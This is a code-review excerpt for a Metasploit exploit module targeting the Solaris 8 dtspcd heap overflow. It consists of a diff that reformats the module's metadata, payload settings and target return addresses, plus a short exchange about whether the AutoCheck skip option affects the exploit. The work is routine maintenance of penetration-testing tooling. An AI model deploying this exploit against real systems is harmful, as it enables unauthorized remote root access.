modules/exploits/solaris/dtspcd/heap_noir.rb

```diff
@@ -7,71 +7,80 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris dtspcd Heap Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris dtspcd Heap Overflow',
+        'Description' => %q{
           This is a port of noir's dtspcd exploit. This module should
-        work against any vulnerable version of Solaris 8 (sparc).
-        The original exploit code was published in the book
-        Shellcoder's Handbook.
-      },
-      'Author'         => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2001-0803'],
-          [ 'OSVDB', '4503'],
-          [ 'BID', '3517'],
-          [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
-          [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
+          work against any vulnerable version of Solaris 8 (sparc).
+          The original exploit code was published in the book
+          Shellcoder's Handbook.
+        },
+        'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2001-0803'],
+          ['OSVDB', '4503'],
+          ['BID', '3517'],
+          ['URL', 'https://web.archive.org/web/20011116020106/http://www.cert.org/advisories/CA-2001-31.html'],
+          ['URL', 'https://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
 
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 800,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 800,
           'BadChars' => "\x00\x0d",
-          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
+          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3)
         },
-      'Platform'       => 'solaris',
-      'Arch'           => ARCH_SPARC,
-      'Targets'        =>
-        [
-          ['Solaris 8',
-            { 'Rets' =>
-              [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
+        'Platform' => 'solaris',
+        'Arch' => ARCH_SPARC,
+        'Targets' => [
+          [
+            'Solaris 8',
+            {
+              'Rets' => [
+                0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ]
+              ]
             }
           ],
         ],
-      'DisclosureDate' => '2002-07-10',
-      'DefaultTarget' => 0))
-
-    register_options(
-      [
-        Opt::RPORT(6112)
-      ])
+        'DisclosureDate' => '2002-07-10',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_RESTARTS ]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(6112)
+    ])
   end
 
-
   def exploit
```

Comment:
Does this exploit still work if the autocheck's skip check datastore option is set?

https://github.com/adfoster-r7/metasploit-framework/blob/3af384316b7d4fad3309d38d79d8b375d120f1c8/lib/msf/core/exploit/remote/auto_check.rb

Reply:
I don't have SPARC hardware to test, but yes, is should. The `check` function doesn't set up anything required by the remainder of the module. `spc_connect` is called within `attack` within the `exploit` method.